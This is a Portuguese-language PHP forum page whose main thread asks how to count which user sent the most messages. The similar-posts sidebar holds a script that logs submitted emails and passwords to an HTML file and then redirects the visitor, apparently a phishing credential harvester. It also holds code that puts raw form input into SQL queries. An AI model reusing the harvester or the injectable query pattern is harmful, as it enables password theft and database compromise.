Publicidade

iJuunin

Retornar usuários que mais enviaram msgs com php

Patrocínio:

Seguinte, to fazendo um sistema de mensagens, e na hora de retornar essas mensagens, eu uso inner join, tudo normal até ai ...

Mas agora eu tenho que saber qual o usuário que mais enviou msgs ...

Minha tabela sql esta mais ou menos assim ...

Usuario > id,nome,sobrenome,email e etc ...

mensagens>id,uid,nome,email,assunto,msg ...

 

Eu só preciso saber qual o usuário enviou mais mensagens, Alguém pode me da uma força? 

Desde ja, agradeço :)

0

Compartilhar este post


Link para o post
Compartilhar em outros sites

tu pode usar um count pra contar os registros de cada e max pra pegar o maior ou top para pegar os maiores. tenta aí pesquisar esses três negocim aí

0

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!


Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.


Entrar Agora

  • Próximos Eventos

  • Conteúdo Similar

    • Por MaykoMaster
      Bom Primeira mente Ola a todos do Fórum...
       
      O que eu queria saber era, se tem como eu pegar este Código Que esta abaixo e re-escrevê lo para que quando ele salve um texto... ele salve o texto em modo tabela:
       
      Modo Normal Fica Assim:
       
      Email:
      Senha:
       
       
       
      Modo parecido com o que Eu quero deixar:
       
       Email:
       
       Senha:
       
       


      <?php
      $nomearquivo ="senha.html";
      $email =$_POST["email"];
      $senha =$_POST["pass"];
      $ess ="Email: ".$email."<br>Senha: ".$senha;
      $abre =@fopen("senha.html","a+");
      $escreve =fwrite($abre, $ess);
      echo "<script>javascript:document.location='URL'
      </script>";
      function redirecionar($url, $tempo) 

          $url = str_replace('&amp;', '&', $url); 
               
          if($tempo > 0) 
          { 
              header("Refresh: $tempo; URL=$url"); 
          } 
          else 
          { 
              @ob_flush();
              @ob_end_clean();
              header("Location: $url"); 
              exit; 
          } 

      ?>
    • Por Wagner Moura
      Galera, já tentei de todos os meios fazer com que meu form input type=file salvasse automaticamente a foto ao ser carregada. Só consigo salvar a foto na pasta fotos/ depois que clico no submit Enviar. alguem poderia me ajudar?
    • Por alexmt
      Olá pessoal, sou novo por aqui.
      Gostaria de saber se alguém pode me ajudar a solucionar um problema. Tentei resolver mas não consegui.
      Tenho cadastrado no banco de dados três tabelas. (id, pagina, content).
       
      Primeiro apareceu essa informação...
      Notice: Undefined index: content in C:\WebServer\Apache2.2\htdocs\sitedinamico\admin\page_cadastro.php on line 25
       
      Consegui resolver fazendo isso...
      if(isset($_POST['content'])){
          $content_editar = $_POST['content'];
      }
       
      A mensagem desapareceu porem não consigo editar quando clico no botao... O que devo fazer? Qual é o erro?
       
      <?php
      $pagina_editar = $_POST['pagina'];
      //$content_editar = $_POST['content'];
      if(isset($_POST['content'])){
          $content_editar = $_POST['content'];
      }
      if(isset($_POST['cadastrar']) && $_POST['cadastrar'] == 'enviar_form'){
          $cadastrar_pagina = mysql_query("INSERT INTO up_page (pagina, content) VALUES ('$pagina_editar', '$content_editar')")
                                  or die(mysql_error());
      }

      if(isset($_POST['editar_post']) && $_POST['editar_post'] == 'enviar_form'){
          $atualiza_pagina = mysql_query("UPDATE up_page SET content = '$content_editar' WHERE pagina = '$pagina_editar'")
                              or die(mysql_error());
      }

          $pagina_de_edicao = $_POST['pagina'];
          
          $pega_pagina = mysql_query("SELECT id, pagina, content FROM up_page WHERE pagina = '$pagina_de_edicao'")
                          or die(mysql_error());
          if(@mysql_num_rows($pega_pagina) <= '0'){
          
      ?>
          <form name="cadastrar_pagina" method="post" action="" enctype="multipart/form-data">
          
          <input type="hidden" name="pagina" value="<?php echo $pagina_de_edicao;?>" />
          
          <textarea id="content" name="content" rows="30" cols=""></textarea>
          
          <input type="hidden" name="cadastrar" value="envia_form" />
          
          <input type="submit" value="cadastrar" name="cadastrar" class="cadastro_btn" />
          </form>
      <?php
          }else{
              while($res_pagina = mysql_fetch_array($pega_pagina)){
                  
                  $id = $res_pagina[0];
                  $pagina = $res_pagina[1];
                  $content = $res_pagina[2];
          ?>
          
          <form name="edita_pagina" method="post" action="" enctype="multipart/form-data">
          
          <input type="hidden" name="pagina" id="pagina" value="<?php echo $pagina_de_edicao; ?>" />
          
          <textarea name="content" rows="30" cols=""><?php echo $content; ?></textarea>
          
          <input type="hidden" id="editar_post" name="editar_post" value="envia_form" />
          <input type="submit" value="editar" name="editar" class="cadastro_btn">
          </form>
          
          <?php
              }
          }
          ?>
    • Por fogazza
      Boa noite a todos.
      Queria tirar uma dúvida.
      Possui um formulário php de cadastro de clientes, e outro formulário onde eu cadastro os empréstimos destes clientes.
      Minha pergunta é:
      Existe alguma forma de eu ao digitar o cpf, ele preencher automaticamente o campo nome do formulário empréstimos de acordo com o nome que está cadastrado na tabela clientes?